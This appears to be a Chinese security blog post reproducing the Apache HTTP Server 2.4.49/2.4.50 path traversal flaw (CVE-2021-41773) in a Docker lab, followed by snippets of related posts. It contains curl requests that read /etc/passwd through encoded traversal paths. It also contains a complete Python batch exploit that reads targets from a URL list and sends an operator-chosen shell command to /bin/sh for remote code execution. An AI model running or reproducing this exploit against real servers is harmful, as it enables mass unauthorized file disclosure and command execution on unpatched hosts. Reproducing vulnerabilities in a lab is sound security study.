CVE-2021-41773 Apache2.4.49&50 路径穿越漏洞复现

原创 已于 2023-03-15 11:48:57 修改 · 971 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #python

于 2021-11-01 13:36:55 首次发布

CVE-2021-41773 Apache2.4.49&50 路径穿越漏洞复现

漏洞原理及影响版本
此次漏洞影响的版本有2.4.49 & 2.4.50版本的ahache
CVE-2021-41773 是在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“要求全部拒绝”的保护,则这些请求可能会成功,如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。
此外,此缺陷可能会泄漏 CGI 脚本等解释文件的来源,已知此问题已被广泛利用。
此问题仅影响 Apache 2.4.49 和 Apache 2.4.50而不是早期版本。
参考链接:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773

1.环境搭建
此次的漏洞复现是在docker上进行
1.1docker的安装
docker的安装可从官网上看https://docs.docker.com/engine/install/centos/
或者看我博文:https://editor.youkuaiyun.com/md/?articleId=116257398

1.2从平台上拉取apache 2.4.49版本
拉取apache镜像
docker pull httpd:2.4.49
查看镜像版本是否正确
docker images
启动镜像
docker run -d -P e91425f38618
docker ps
在这里插入图片描述

进入容器
docker exec -it 4af5d1983b99 /bin/bash
在这里插入图片描述

修改镜像里面conf/httpd.conf的配置文件
如果出现以下这种情况,则输入以下两行代码即可安装vim
apt-get update
apt-get -y install vim
在这里插入图片描述

编辑conf/httpd.conf下的这两行,注释掉重新加进去
在这里插入图片描述

2.漏洞复现
查看映射端口
在这里插入图片描述

浏览器访问
在这里插入图片描述

用另一台机器访问
curl http://192.168.160.129:49154
curl http://192.168.160.129:49154/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
在这里插入图片描述
也可以用抓包改包软件来重构exp获取
在这里插入图片描述
批量poc&&exp脚本:

import requests
from requests import Request,Session

#http://192.168.81.136:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
hearder={
    "Accept":"*/*",
    "Accept-Language": "en",
    "Connection": "close",
    "Content-Type": "application/x-www-form-urlencoded",
    "User-Agent":"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.4) Gecko/20011128 Netscape6/6.2.1",
}
# proxy={
#     "http":"http://127.0.0.1:8080"
# }

def ahs(cmd):
    u = open('url.txt','r',encoding='utf-8')
    for url in u:
        try:
            icon = "/icons/"
            p = requests.get(url=url, headers=hearder,timeout=1)
            if p.status_code == 200:
                s = Session()
                url_poc = url+"/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
                req1 = Request('GET',url=url_poc,headers=hearder)
                pre = req1.prepare()
                pre.url = url_poc
                response1 = s.send(pre,timeout=1)#,proxies=proxy)
                if response1.status_code == 200:
                    # print(response1.text)
                    try:
                        url_exp = url+"/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"
                        command = "echo;"+cmd
                        req = Request('POST', url=url_exp, data=command, headers=hearder)
                        prepare = req.prepare()  # 转换成元类
                        prepare.url = url_exp
                        response = s.send(prepare, timeout=1)  # ,proxies=proxy)
                        out = response.text
                        # out=out.replace('\n', '')
                        print("输出结果为:"+out)
                    except Exception as e:
                        pass
                else:
                    print(response1.status_code)
            else:
                print(p.status_code)
        except Exception as e:
            pass
            print("无poc"+'\n')

if __name__ == '__main__':
    print("本代码为‘Apache HTTP Server 2.4.49中的路径遍历和文件泄漏漏洞(CVE-2021-41773)’的poc及exp批量化代码")
    cmd=input("请输入注入命令:")
    ahs(cmd)
Apache HTTP Server漏洞CVE-2021-41773
weixin_44769042的博客
10-26 6388
漏洞复现记录--1 搭建环境 容器可以直接从DockerHub使用 dockerpullblueteamsteve/cve-2021-41773:no-cgid 使用: dockerrun-dit-p8080:80blueteamsteve/cve-2021-41773:no-cgid 访问:ip:8080
CVE-2021-41773漏洞复现
dreamthe的博客
10-18 8452
1.安装debian系统 首先我选择的系统是debian10版本,也可以在别的系统完成复现,我想一个纯净版,所有重新安装了一个系统,安装步骤简单展示一下。 1.创建虚拟机,点击下一步。 导入镜像 自己选安装的位置以及虚拟机的名称。 安装过程需要设置管理员密码和新建一个用户,自己设置一下就可以了 这里选择了第二个。 因为之前我们选择了lvm,那么这里选择是就可以了 因为我们需要一个简单系统,所有只选择了下面三个安装软件 中间少的部分就是一直点击继续就可..
apache-cve_2021_41773
最新发布
m0_49197645的博客
10-22 615
CVE-2021-41773Apache HTTP Server 2.4.49 版本中的一个​​路径遍历和远程代码执行漏洞​​。该漏洞由于对路径规范化处理的缺陷,允许攻击者绕过安全限制,访问 Web 根目录以外的文件。在特定配置下,如果允许使用 CGI(如.cgi文件),攻击者甚至可以在目标服务器上执行任意命令。这是一个高危漏洞,因为利用门槛低,影响范围广。
第六届“强网杯”青少年专项赛 writewp by 楠辞姐姐后援团
JEWSWS的博客
09-11 3125
这次比赛难度很大,Crypto部分也全都是猜谜语类型的题目,没啥游戏体验,不过好在排名在前30.本篇WP为团队WP,团队成员为:树木,AcexZe,Lenyi战队名称:楠辞姐姐后援团战队排名:24
Apache——CVE-2021-41773
qq_45770644的博客
10-06 4101
前言: Apache Software 已迅速发布了针对 Apache HTTP Server 中的零日安全漏洞的修复程序,该漏洞于上周首次报告给该项目。该漏洞正在野外被积极利用,它表示,并可能允许攻击者访问敏感信息。 CVE-2021-41773可能允许路径遍历和随后的文件泄露。路径遍历问题允许未经授权的人访问 Web 服务器上的文件,方法是欺骗 Web 服务器或在其上运行的 Web 应用程序返回存在于 Web 根文件夹之外的文件。 该问题仅影响 Apache 开源 Web 服务器的 2.4.49.
CVE-2021-41773Apache 文件读取&命令执行)复现
Biu_Biu_Bi的博客
01-03 1043
Apache httpd Server 2.4.49 版本引入了一个具有路径穿越漏洞的新函数,但需要配合穿越的目录 配置 Require all granted,攻击者可利用该漏洞实现路径穿越从而读取任意文件,或者在配置了cgi的httpd程序中执行bash指令,从而有机会控制服务器。
CVE-2021-42013-Apache HTTP Server 2.4.50路径穿越流量特征
12306小哥
10-10 1575
0x1 简介 Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。Apache官方在2.4.50版本中对2.4.49版本中出现的目录穿越漏洞CVE-2021-41773进行了修复,但这个修复是不完整的,CVE-2021-42013是对补丁的绕过。 攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。 这个漏洞可以影响Apache HTTP Server 2.4.
vulhub-Apache HTTP Server 2.4.50 路径穿越漏洞CVE-2021-42013)复现
m0_58265086的博客
09-09 351
Apache 披露了一个在 Apache HTTP Server 2.4.49 上引入的漏洞,称为 CVE-2021-41773。同时发布了2.4.50更新,修复了这个漏洞Apache HTTP Server(简称 Apache)是开源的 Web 服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的 Web 服务器端软件之一。-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件,进而造成敏感信息泄露。
Apache HTTP Server 2.4.49 路径穿越漏洞CVE-2021-41773
weixin_47311099的博客
12-07 2227
Apache HTTP Server 2.4.49 路径穿越漏洞复现CVE-2021-41773Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响: 版本等于2.4.49 穿越的目录允许被访问,比如配置了<Directory />Require all granted</Directory>。(默认情况下是不允许的) 攻击者利用这个漏洞,可以
漏洞复现CVE-2021-41773 Apache HTTP Server 2.4.49 路径穿越漏洞
m0_53121608的博客
07-13 247
漏洞复现CVE-2021-41773 Apache HTTP Server 2.4.49 路径穿越漏洞
Apache HTTPd 2.4.49 路径穿越漏洞CVE-2021-41773复现
weixin_59086772的博客
12-10 2633
0x00 漏洞概述 2021年10月5日,Apache官方发布了一批漏洞信息,其中Apache HTTP Server路径穿越漏洞CVE-2021-41773。 满足条件: 版本等于2.4.49 穿越的目录允许被访问,比如配置了Require all granted。(默认情况下是不允许的) 0x01环境搭建 使用docker搭建Apache HTTPd 2.4.49版本服务器: Dockerfile FROM vulhub/httpd:2.4.49 LABEL mai
CVE-2021-41773
Dikesi的博客
02-08 881
Apache HTTP Server 路径穿越漏洞
CVE-2021-41773 漏洞复现
Jay17的博客
07-13 1571
CVE-2021-41773 漏洞复现
Apache HTTP Server路径穿越漏洞复现(CVE-2021-41773)
小小猪的博客
10-26 3953
sudo docker pull blueteamsteve/cve-2021-41773:no-cgid sudo docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
CVE-2021-41773 - (apache 文件读取&命令执行)漏洞复现
三天不打上房揭瓦的博客
10-08 3823
目录漏洞描述影响版本漏洞复现漏洞修复 漏洞描述 CVE-2021-41773 漏洞是在 9 月 15 日发布的 2.4.49 版中对路径规范化所做的更改引入到 Apache HTTP Server 中的。此漏洞仅影响具有“require all denied”访问权限控制配置被禁用的Apache HTTP Server 2.4.49 版本。成功的利用将使远程攻击者能够访问易受攻击的 Web 服务器上文档根目录之外的任意文件。根据该公告,该漏洞还可能泄露“CGI 脚本等解释文件的来源”,其中可能包含攻击者可以
漏洞复现CVE-2021-41773
qq_70836100的博客
08-06 454
漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录 Require all granted允许被访问的的情况下(默认开启),攻击者可利⽤该路 径穿越漏洞读取到Web⽬录之外的其他⽂件。Apache HTTP Server 2.4.49 某些Apache HTTPd 2.4.50也存在此漏洞。在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令(RCE)
Apache HTTP Server 路径穿越漏洞复现(CVE-2021-41773 )
qq_59975439的博客
06-10 7597
Apache HTTP Server 路径穿越漏洞复现(CVE-2021-41773 )
Apache漏洞CVE-2021-41773
qq_68186313的博客
08-07 384
漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录 Require all granted允许被访问的的情况下(默认开启),攻击者可利⽤该路 径穿越漏洞读取到Web⽬录之外的其他⽂件 在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令(RCE)3、在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cg命令。
apache 文件读取&命令执行(CVE-2021-41773)
m0_65150886的博客
12-28 646
CVE-2021-41773 漏洞是在 9 月 15 日发布的 2.4.49 版中对路径规范化所做的更改引入到 Apache HTTP Server 中的。此漏洞仅影响具有“require all denied”访问权限控制配置被禁用的Apache HTTP Server 2.4.49 版本。成功的利用将使远程攻击者能够访问易受攻击的 Web 服务器上文档根目录之外的任意文件。根据该公告,该漏洞还可能泄露“CGI 脚本等解释文件的来源”,其中可能包含攻击者可以利用该漏洞进行进一步攻击的敏感信息。
CVE-2021-41773复现
06-29
CVE-2021-41773漏洞主要影响Apache HTTP Server,该漏洞源于服务器对路径遍历过滤处理不当。攻击者可以利用此漏洞读取或访问服务器上的任意文件,包括受限目录下的敏感文件。 ### 漏洞复现步骤和方法 #### 1. 环境准备 为了复现漏洞,需要搭建一个存在漏洞Apache HTTP Server环境。建议使用Docker或者虚拟机来隔离测试环境以避免对主系统造成影响。 ```bash # 安装必要的工具链 sudo apt-get update sudo apt-get install docker.io -y ``` #### 2. 获取并运行受影响版本的Apache HTTP Server 使用Docker容器快速部署一个包含CVE-2021-41773漏洞Apache HTTP Server实例。确保使用的是受此漏洞影响的Apache版本(例如Apache 2.4.49)[^3]。 ```bash docker run -d -p 80:80 httpd:2.4.49 ``` #### 3. 构造恶意请求 通过构造特定格式的URL请求,尝试访问受限资源。具体来说,可以通过发送带有`%2e./`或`.%2e/`等特殊编码的路径穿越字符串的HTTP请求来触发漏洞。例如,想要访问根目录下的`/etc/passwd`文件,可以构造如下URL: ``` http://<target-ip>/%2e./%2e./%2e./%2e./%2e./%2e./%2e./%2e./%2e./etc/passwd ``` 其中`<target-ip>`应替换为实际的目标服务器IP地址或域名。 #### 4. 观察响应 如果目标服务器确实受到此漏洞的影响,则上述请求可能会成功返回指定文件的内容,比如显示`/etc/passwd`文件中的信息。 #### 5. 验证与修复 一旦确认了漏洞的存在,接下来应该采取措施进行修复。官方已经发布了针对此问题的安全更新,升级到最新版的Apache HTTP Server即可解决问题。此外,还可以通过配置`.htaccess`文件或修改主配置文件中的`<Directory>`段落来限制不必要的文件访问权限,从而减轻风险。 ### 注意事项 - 在执行任何渗透测试之前,请确保拥有合法授权,并且仅在受控环境中操作。 - 使用专门为此目的设立的测试机器,避免意外损害生产系统。 - 所有活动都应当遵循当地法律法规以及道德规范。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值